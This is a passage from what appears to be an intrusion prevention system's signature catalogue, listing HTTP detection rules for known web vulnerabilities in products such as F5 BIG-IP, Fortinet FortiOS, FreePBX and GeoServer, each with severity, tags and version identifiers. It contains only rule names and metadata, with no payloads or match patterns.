First detected in: sgpkg-ips-338-4219
Last changed: sgpkg-ips-771-5211
Vulnerability: Sun-Java-Web-Server-WebDAV-Stack-Overflow-Vulnerability
Description:
Back to top

HTTP_CRL-Excessively-Long-Options-Request-Argument

About this situation: An excessively long argument field in HTTP options request detected
Context: HTTP Normalized Request-Line
Severity: 2
Tags: Any Operating System, Any Hardware, Sun Java Web Server, CVE2010, Any Operating System not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-338-4219
Last changed: sgpkg-ips-1448-5242
Vulnerability: Sun-Java-Web-Server-WebDAV-Stack-Overflow-Vulnerability
Description:
Back to top

HTTP_CRL-Excessively-Long-Propfind-Request-Argument

About this situation: An excessively long argument field in HTTP propfind request detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Sun Java Web Server, CVE2010, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-338-4219
Last changed: sgpkg-ips-512-5211
Vulnerability: Sun-Java-Web-Server-WebDAV-Stack-Overflow-Vulnerability
Description:
Back to top

HTTP_CRL-Excessively-Long-Proppatch-Request-Argument

About this situation: An excessively long argument field in HTTP proppatch request detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Sun Java Web Server, CVE2010, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-338-4219
Last changed: sgpkg-ips-512-5211
Vulnerability: Sun-Java-Web-Server-WebDAV-Stack-Overflow-Vulnerability
Description:
Back to top

HTTP_CRL-Exponent-CMS-Eaascontroller-API-Function-SQL-Injection

About this situation: An attempt to exploit a vulnerability in exponent CMS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, exponent CMS, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-895-5242
Last changed: sgpkg-ips-895-5242
Vulnerability: Exponent-CMS-Eaascontroller-API-Function-SQL-Injection
Description:
Back to top

HTTP_CRL-eXtropia-Webstore-Command-Execution

About this situation: Extropia Webstore command execution
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, eXtropia WebStore, CVE2004, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-506-5211
Vulnerability: HTTP-eXtropia-Webstore-Command-Execution
Description:
Back to top

HTTP_CRL-EyesOfNetwork-Autodiscovery-Target-Command-Execution-CVE-2020-8654

About this situation: An attempt to exploit a vulnerability in EyesOfNetwork detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Unix, Linux, Any Hardware, EyesOfNetwork, CVE2020, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1232-5242
Last changed: sgpkg-ips-1834-5242
Vulnerability: EyesOfNetwork-Autodiscovery-Target-Command-Execution-CVE-2020-8654
Description:
Back to top

HTTP_CRL-EyesOfNetwork-Username-SQL-Injection-CVE-2020-8656

About this situation: An attempt to exploit a vulnerability in EyesOfNetwork detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Unix, Linux, Any Hardware, EyesOfNetwork, CVE2020, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1834-5242
Last changed: sgpkg-ips-1834-5242
Vulnerability: EyesOfNetwork-Username-SQL-Injection-CVE-2020-8656
Description:
Back to top

HTTP_CRL-Ezcontents-Globals-Php-Code-Injection

About this situation: Ezcontents arbitrary PHP code injection
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, ezContents, CVE2004, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-12-1102
Last changed: sgpkg-ips-513-5211
Vulnerability: HTTP-Ezcontents-Globals-Php-Code-Injection
Description:
Back to top

HTTP_CRL-Ezcontents-Module-Php-Link-System-Compromise

About this situation: Ezcontents arbitrary PHP code execution
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ezContents, CVE2004, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-513-5211
Vulnerability: HTTP-Ezcontents-Module-Php-Link-System-Compromise
Description:
Back to top

HTTP_CRL-F5-Big-IP-And-Big-IQ-iControl-iControlportal.cgi-Format-String-Vulnerability

About this situation: An attempt to exploit a vulnerability in F5 Networks BIG-IP detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, F5 Networks BIG-IP, F5 Networks Big-IQ, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1564-5242
Last changed: sgpkg-ips-1564-5242
Vulnerability: F5-Big-IP-And-Big-IQ-iControl-iControlportal.cgi-Format-String-Vulnerability
Description:
Back to top

HTTP_CRL-F5-Big-IP-Dbquery.jsp-SQL-Injection

About this situation: An attempt to exploit a vulnerability in F5 Networks BIG-IP detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, F5 Networks BIG-IP, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1678-5242
Last changed: sgpkg-ips-1678-5242
Vulnerability: F5-Big-IP-Dbquery.jsp-SQL-Injection
Description:
Back to top

HTTP_CRL-F5-Big-IP-Next-Central-Manager-Validateuserincm-OData-Injection

About this situation: An attempt to exploit a vulnerability in F5 Networks BIG-IP Next Central Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, F5 Networks BIG-IP Next Central Manager, CVE2024, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1730-5242
Last changed: sgpkg-ips-1730-5242
Vulnerability: F5-Big-IP-Next-Central-Manager-Validateuserincm-OData-Injection
Description:
Back to top

HTTP_CRL-F5-iControl-Rest-Unauthenticated-RCE-CVE-2021-22986

About this situation: An attempt to exploit a vulnerability in F5 iControl REST detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, F5 Networks BIG-IP, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1331-5242
Last changed: sgpkg-ips-1463-5242
Vulnerability: F5-iControl-Rest-Unauthenticated-RCE-CVE-2021-22986
Description:
Back to top

HTTP_CRL-F5-iControl-Rest-Unauthenticated-RCE-CVE-2022-1388

About this situation: An attempt to exploit a vulnerability in F5 iControl REST detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, F5 Networks BIG-IP, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1463-5242
Last changed: sgpkg-ips-1531-5242
Vulnerability: F5-iControl-Rest-Unauthenticated-RCE-CVE-2022-1388
Description:
Back to top

HTTP_CRL-F5-Networks-Big-IP-iControl-Privilege-Escalation

About this situation: An attempt to exploit an F5 Networks Big-IP iControl Privilege Escalation vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, F5 Networks BIG-IP, CVE2015, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-769-5211
Last changed: sgpkg-ips-774-5211
Vulnerability: F5-Networks-Big-IP-iControl-Privilege-Escalation
Description:
Back to top

HTTP_CRL-F5-Networks-Big-IP-TMUI-Directory-Traversal-CVE-2020-5902

About this situation: An attempt to exploit an F5 Networks Big-IP TMUI Directory Traversal vulnerability
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, F5 Networks BIG-IP, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1261-5242
Last changed: sgpkg-ips-1263-5242
Vulnerability: F5-Networks-Big-IP-TMUI-Directory-Traversal-CVE-2020-5902
Description:
Back to top

HTTP_CRL-FakeInst.BL-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Android, Any Hardware, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-694-5211
Vulnerability: Android.Trojan.FakeInst.BL-Botnet
Description:
Back to top

HTTP_CRL-Falcon-One-Error-Page-Remote-File-Inclusion

About this situation: Detected an attempt to exploit a file inclusion vulnerability in Falcon One CMS
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Falcon One CMS, CVE2007, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-202-2032
Last changed: sgpkg-ips-202-2032
Vulnerability: Falcon-One-Error-Page-Remote-File-Inclusion
Description:
Back to top

HTTP_CRL-Fancy-Product-Designer-Plugin-For-Wordpress-Unauthenticated-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Fancy Product Designer plugin for WordPress detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1829-5242
Last changed: sgpkg-ips-1829-5242
Vulnerability: Fancy-Product-Designer-Unauthenticated-SQL-Injection
Description:
Back to top

HTTP_CRL-FBCIndex-Access

About this situation: An attempt to download FBCIndex file
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Mac OS X, Any Hardware, Suspected Disclosure, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-442-4219
Last changed: sgpkg-ips-925-5242
Vulnerability: FBCIndex-Access
Description:
Back to top

HTTP_CRL-Flame-Skywiper-Possible-POST-Request-To-CnC

About this situation: Possible Flame/Skywiper POST Request to CnC server
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-456-5211
Last changed: sgpkg-ips-456-5211
Vulnerability: Flame-Skywiper-Malware
Description:
Back to top

HTTP_CRL-Flarum-Core-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Flarum detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Flarum, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1382-5242
Last changed: sgpkg-ips-1382-5242
Vulnerability: Flarum-Core-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-FlexDotnetCMS-Arbitrary-Asp-File-Upload

About this situation: An attempt to exploit a vulnerability in FlexDotnetCMS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, FlexDotnetCMS, CVE2020, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1359-5242
Last changed: sgpkg-ips-1637-5242
Vulnerability: FlexDotnetCMS-Arbitrary-Asp-File-Upload
Description:
Back to top

HTTP_CRL-Flexense-Vx-Search-Enterprise-Add_Command-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Flexense VX Search Enterprise detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Flexense VX Search Enterprise, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1028-5242
Last changed: sgpkg-ips-1028-5242
Vulnerability: Flexense-Vx-Search-Enterprise-Add_Command-Buffer-Overflow
Description:
Back to top

HTTP_CRL-FLIR-AX8-Unauthenticated-RCE

About this situation: An attempt to exploit a vulnerability in FLIR AX8 cameras detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Unix, Linux, Any Hardware, FLIR, CVE2022, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1525-5242
Last changed: sgpkg-ips-1536-5242
Vulnerability: FLIR-AX8-Unauthenticated-RCE
Description:
Back to top

HTTP_CRL-Fluent-Bit-Memory-Corruption-CVE-2024-4323

About this situation: An attempt to exploit a vulnerability in Fluent Bit detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Fluent Bit, CVE2024, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1729-5242
Last changed: sgpkg-ips-1729-5242
Vulnerability: Fluent-Bit-Memory-Corruption-CVE-2024-4323
Description:
Back to top

HTTP_CRL-ForgeRock-Access-Management-And-OpenAM-Jato-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in ForgeRock Access Management detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ForgeRock OpenAM, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1372-5242
Last changed: sgpkg-ips-1372-5242
Vulnerability: ForgeRock-Access-Management-And-OpenAM-Jato-Insecure-Deserialization
Description:
Back to top

HTTP_CRL-FormMail-Command-Execution

About this situation: Command execution attempt in FormMail
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Unix, Any Hardware, Matt Wright FormMail, CVE1999, Unix not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-3-1102
Last changed: sgpkg-ips-507-5211
Vulnerability: HTTP-Cgi-FormMail-Command-Execution
Description:
Back to top

HTTP_CRL-Fortinet-FortiOS-Authorization-Bypass

About this situation: An attempt to exploit a vulnerability in Fortinet FortiOS
Context: HTTP Normalized Request-Line
Severity: 7
Tags: FortiGate OS, Any Hardware, CVE2018, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1185-5242
Last changed: sgpkg-ips-1185-5242
Vulnerability: Fortinet-FortiOS-Authorization-Bypass
Description:
Back to top

HTTP_CRL-Fortinet-FortiOS-Path-Traversal-CVE-2018-13379

About this situation: An attempt to exploit a vulnerability in Fortinet FortiOS detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: FortiOS, Any Hardware, CVE2018, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1304-5242
Last changed: sgpkg-ips-1441-5242
Vulnerability: Fortinet-FortiOS-Path-Traversal-CVE-2018-13379
Description:
Back to top

HTTP_CRL-Fortinet-Fortiweb-OS-Command-Injection

About this situation: An attempt to exploit a vulnerability in Fortinet FortiWeb OS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: FortiOS, Any Hardware, CVE2021, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1381-5242
Last changed: sgpkg-ips-1391-5242
Vulnerability: Fortinet-Fortiweb-OS-Command-Injection
Description:
Back to top

HTTP_CRL-Fortinet-Multiple-Products-Certificate-Import-Format-String-CVE-2024-45324

About this situation: An attempt to exploit a vulnerability in Fortinet FortiOS
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Fortinet FortiOS, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1868-5242
Last changed: sgpkg-ips-1868-5242
Vulnerability: Fortinet-Multiple-Products-Certificate-Import-Format-String-CVE-2024-45324
Description:
Back to top

HTTP_CRL-FortiOS-And-FortiProxy-SSLVPN-Heap-Buffer-Overflow-CVE-2023-27997

About this situation: An attempt to exploit a vulnerability in FortiOS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: FortiOS, Any Hardware, CVE2023, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1601-5242
Last changed: sgpkg-ips-1601-5242
Vulnerability: FortiOS-And-FortiProxy-SSLVPN-Heap-Buffer-Overflow-CVE-2023-27997
Description:
Back to top

HTTP_CRL-Fortra-FileCatalyst-Workflow-SQL-Injection-CVE-2024-5276

About this situation: An attempt to exploit a vulnerability in Fortra FileCatalyst detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Fortra FileCatalyst Workflow, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1745-5242
Last changed: sgpkg-ips-1755-5242
Vulnerability: Fortra-FileCatalyst-Workflow-SQL-Injection-CVE-2024-5276
Description:
Back to top

HTTP_CRL-Four-Faith-Routers-F3x24-F3x36-Remote-Command-Injection-CVE-2024-12856

About this situation: An attempt to exploit a vulnerability in Four-Faith router detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Four-Faith Router, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1818-5242
Last changed: sgpkg-ips-1822-5242
Vulnerability: Four-Faith-Routers-F3x24-F3x36-Remote-Command-Injection-CVE-2024-12856
Description:
Back to top

HTTP_CRL-Foxit-Reader-Insecure-Library-Loading

About this situation: An attempt to exploit a vulnerability in Foxit Software Foxit Reader detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Foxit Reader, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-493-5211
Last changed: sgpkg-ips-493-5211
Vulnerability: Foxit-Reader-Insecure-Library-Loading
Description:
Back to top

HTTP_CRL-FreePBX-Framework-Hotelwakeup-Module-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in FreePBX Project hotelwakeup Module detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, FreePBX, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-830-5242
Last changed: sgpkg-ips-1013-5242
Vulnerability: FreePBX-Framework-Hotelwakeup-Module-Directory-Traversal
Description:
Back to top

HTTP_CRL-FreePBX-Framework-Module-Config.php-Code-Execution

About this situation: An attempt to exploit a vulnerability in FreePBX Project FreePBX detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, FreePBX, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-597-5211
Last changed: sgpkg-ips-925-5242
Vulnerability: FreePBX-Framework-Module-Config.php-Code-Execution
Description:
Back to top

HTTP_CRL-FreePBX-Framework-Modulefunctions-Display-SQL-Injection

About this situation: An attempt to exploit a vulnerability in FreePBX Project FreePBX detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, FreePBX, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-800-5242
Last changed: sgpkg-ips-800-5242
Vulnerability: FreePBX-Framework-Modulefunctions-Display-SQL-Injection
Description:
Back to top

HTTP_CRL-FreePBX-Framework-Recordings-Module-Remote-Command-Execution

About this situation: An attempt to exploit a vulnerability in FreePBX detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, FreePBX, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-798-5211
Last changed: sgpkg-ips-798-5211
Vulnerability: FreePBX-Framework-Recordings-Module-Remote-Command-Execution
Description:
Back to top

HTTP_CRL-FreePBX-Remotemod-Remote-Command-Execution

About this situation: A vulnerabliity in FreePBX
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, FreePBX, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-800-5242
Last changed: sgpkg-ips-800-5242
Vulnerability: FreePBX-Remotemod-Remote-Command-Execution
Description:
Back to top

HTTP_CRL-Froxlor-Log-Path-RCE

About this situation: An attempt to exploit a vulnerability in Froxlor detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Unix, Linux, Any Hardware, Froxlor, CVE2023, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1564-5242
Last changed: sgpkg-ips-1567-5242
Vulnerability: Froxlor-Log-Path-RCE
Description:
Back to top

HTTP_CRL-FTGate4-Buffer-Overflow-Vulnerability

About this situation: Detects FTGate4 Buffer Overflow exploits
Context: HTTP Normalized Request-Line
Severity: 2
Tags: Any Operating System, Any Hardware, Floosietek FTGatePro, CVE2005, Any Operating System not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-57-1210
Last changed: sgpkg-ips-1589-5242
Vulnerability: Generic-FTGate4-Buffer-Overflow
Description:
Back to top

HTTP_CRL-FtpLocate-Command-Execution

About this situation: FtpLocate command execution attempt detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Unix, Any Hardware, FtpLocate, CVE2005, Unix not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-39-1210
Last changed: sgpkg-ips-514-5211
Vulnerability: HTTP-FtpLocate-Command-Execution
Description:
Back to top

HTTP_CRL-Fuel-CMS-SQL-Injection-CVE-2020-17463

About this situation: An attempt to exploit a vulnerability in Fuel CMS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Fuel CMS, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1419-5242
Last changed: sgpkg-ips-1419-5242
Vulnerability: Fuel-CMS-SQL-Injection-CVE-2020-17463
Description:
Back to top

HTTP_CRL-Fujitsu-Siemens-ServerView-Command-Execution-CVE-2007-3011

About this situation: An attempt to exploit a vulnerability in ServerView detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-684-5211
Last changed: sgpkg-ips-684-5211
Description:
Back to top

HTTP_CRL-FusionPBX-Command-Exec.php-Command-Execution

About this situation: A vulnerability in FusionPBX detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Unix, Linux, Any Hardware, FusionPBX, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1206-5242
Last changed: sgpkg-ips-1206-5242
Vulnerability: FusionPBX-Command-Exec.php-Command-Execution
Description:
Back to top

HTTP_CRL-FXC-AE1021PE-Router-Command-Injection-CVE-2023-49897

About this situation: An attempt to exploit a vulnerability in FXC AE1021PE router firmware detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, FXC AE1021PE, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1729-5242
Last changed: sgpkg-ips-1822-5242
Vulnerability: FXC-AE1021PE-Router-Command-Injection-CVE-2023-49897
Description:
Back to top

HTTP_CRL-Gambio-Online-Webshop-Unauthenticated-PHP-Deserialization-Vulnerability

About this situation: An attempt to exploit a vulnerability in Gambio Online Webshop detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Gambio Online Webshop, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1720-5242
Last changed: sgpkg-ips-1720-5242
Vulnerability: Gambio-Online-Webshop-Unauthenticated-PHP-Deserialization-Vulnerability
Description:
Back to top

HTTP_CRL-GE-Fanuc-Proficy-HMI/SCADA-CIMPLICITY-Webserver-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Ge Fanuc Proficy CIMPLICITY HMI server detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Ge Fanuc Proficy CIMPLICITY HMI server, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-608-5211
Vulnerability: GE-Fanuc-Proficy-HMI/SCADA-CIMPLICITY-Webserver-Information-Disclosure
Description:
Back to top

HTTP_CRL-GE-Mds-Pulsenet-Hidden-Support-Account-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in General Electric MDS PulseNET detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, General Electric MDS PulseNET, CVE2015, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-691-5211
Last changed: sgpkg-ips-691-5211
Vulnerability: GE-Mds-Pulsenet-Hidden-Support-Account-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-General-Client-Login-Attempt

About this situation: Partial detection for a ScadaBR Brute Force Attack correlation.
Context: HTTP Normalized Request-Line
Severity: 1
Tags: Windows, Any Hardware, ScadaBR, Windows not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-627-5211
Last changed: sgpkg-ips-1758-5242
Vulnerability: ScadaBR-BruteForce-Password-Attack
Description:
Back to top

HTTP_CRL-Generic-Cmd-Encoder

About this situation: Possible command line payload encoder
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-682-5211
Last changed: sgpkg-ips-1013-5242
Description:
Back to top

HTTP_CRL-GeoServer-Jiffle-Remote-Code-Execution-CVE-2022-24816

About this situation: An attempt to exploit a vulnerability in GeoServer detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, GeoServer, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1756-5242
Last changed: sgpkg-ips-1756-5242
Vulnerability: GeoServer-Jiffle-Remote-Code-Execution-CVE-2022-24816
Description:
Back to top

HTTP_CRL-GeoServer-Server-Side-Request-Forgery-CVE-2021-40822

About this situation: An attempt to exploit a vulnerability in GeoServer detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, GeoServer, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1836-5242
Last changed: sgpkg-ips-1836-5242
Vulnerability: GeoServer-Server-Side-Request-Forgery-CVE-2021-40822
Description:
Back to top

HTTP_CRL-GeoServer-SQL-Injection-CVE-2023-25157

About this situation: An attempt to exploit a vulnerability in Geoserver detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, GeoServer, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1635-5242
Last changed: sgpkg-ips-1635-5242
Vulnerability: GeoServer-SQL-Injection-CVE-2023-25157
Description:
Back to top

HTTP_CRL-GeoServer-Unauthenticated-Remote-Code-Execution-CVE-2024-36401

About this situation: An attempt to exploit a vulnerability in GeoServer detected
Context: HTTP Normalized Request-Line
Severity: 7
